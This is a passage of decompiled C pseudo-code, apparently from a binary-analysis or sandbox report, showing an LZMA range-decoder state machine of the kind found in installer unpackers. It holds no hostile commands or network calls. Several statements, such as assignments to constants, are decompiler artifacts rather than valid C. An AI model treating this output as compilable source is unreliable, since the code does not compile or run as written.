													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
